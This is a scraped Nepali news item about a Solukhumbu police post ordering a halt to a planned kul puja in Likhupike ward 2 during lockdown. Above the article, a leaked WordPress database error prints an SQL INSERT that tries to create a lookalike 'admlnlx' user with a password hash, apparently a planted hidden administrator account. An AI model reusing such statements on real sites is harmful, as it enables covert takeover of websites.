WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiKrWP.gO6I76CfpemZf6iV8B3TXnR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 08:35:45', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु – अस्थायी प्रहरी चौकी गोली, सोलुखुम्बुले लकडाउनलाई ध्यानमा राख्दै लिखुपिके गाउँपालिका वडा नम्बर २ मा हुन लागेको सूचना जारी गरेको छ ।
प्रहरी चौकी गोली, सोलुखुम्बुले लकडाउनलाई ध्यानमा राख्दै लिखुपिके गाउँपालिका वडा नम्बर २ मा हुन लागेको कुलपूजा रोक्न सूचना जारी गरेको छ ।
वडा नम्बर २ का बस्नेत, खड्का, र अन्य जातजातिले बैशाख २१ देखि २५ सम्म कुलपूजा समापन गर्ने भन्ने खबर सुन्नमा आइको भन्दै यस्तो कार्यक्रम तत्काल रोक्न प्रहरी चौकीले सूचना जारी गरेको हो । यस्ता कार्यक्रम गर्दा लक डाउनको उल्लङ्घन हुने भएकोले जिल्ला विपद् व्यवस्थापन समितिको बैशाख १६ गतेको निर्णय अनुसार यस्ता कुनै पनि कार्यक्रम नगर्न अनुरोध गरिएको छ ।